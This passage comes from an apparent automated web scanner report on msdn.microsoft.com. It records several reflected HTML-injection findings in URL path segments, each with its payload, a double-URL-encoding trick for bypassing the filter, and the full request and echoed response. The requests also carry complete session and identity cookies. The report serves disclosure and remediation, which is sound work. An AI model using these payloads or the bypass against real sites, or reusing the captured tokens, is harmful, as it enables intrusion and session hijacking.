Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9211
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:15:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usce0fb"><a>210aa7e2390/library/ee663300(VS.85" />
...[SNIP]...

2.85. http://msdn.microsoft.com/en-us/library/ee663300(VS.85 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ee663300(VS.85

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4583f%2522%253e%253ca%253e3ce016e5681 was submitted in the REST URL parameter 2. This input was echoed as 4583f"><a>3ce016e5681 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library4583f%2522%253e%253ca%253e3ce016e5681/ee663300(VS.85 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9211
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:16:03 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library4583f"><a>3ce016e5681/ee663300(VS.85" />
...[SNIP]...

2.86. http://msdn.microsoft.com/en-us/library/ee663300(VS.85 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ee663300(VS.85

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17e66%2522%253e%253ca%253e75a4d87b1f0 was submitted in the REST URL parameter 3. This input was echoed as 17e66"><a>75a4d87b1f0 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/ee663300(VS.8517e66%2522%253e%253ca%253e75a4d87b1f0 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9211
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:16:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ee663300(VS.8517e66"><a>75a4d87b1f0" />
...[SNIP]...

2.87. http://msdn.microsoft.com/en-us/library/ee663300(VS.85).aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ee663300(VS.85).aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f03f2%2522%253e%253ca%253e020d19f1e98 was submitted in the REST URL parameter 1. This input was echoed as f03f2"><a>020d19f1e98 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-usf03f2%2522%253e%253ca%253e020d19f1e98/library/ee663300(VS.85).aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9213
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:43 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usf03f2"><a>020d19f1e98/library/ee663300(VS.85)" />
...[SNIP]...

2.88. http://msdn.microsoft.com/en-us/library/ee663300(VS.85).aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ee663300(VS.85).aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d063%2522%253e%253ca%253e98b4bfeb5d1 was submitted in the REST URL parameter 2. This input was echoed as 9d063"><a>98b4bfeb5d1 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library9d063%2522%253e%253ca%253e98b4bfeb5d1/ee663300(VS.85).aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9213
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library9d063"><a>98b4bfeb5d1/ee663300(VS.85)" />
...[SNIP]...

2.89. http://msdn.microsoft.com/en-us/library/ee663300(VS.85).aspx [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ee663300(VS.85).aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa396%2522%253e%253ca%253eddc59ddb169 was submitted in the REST URL parameter 3. This input was echoed as fa396"><a>ddc59ddb169 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/ee663300(VS.85).aspxfa396%2522%253e%253ca%253eddc59ddb169 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; 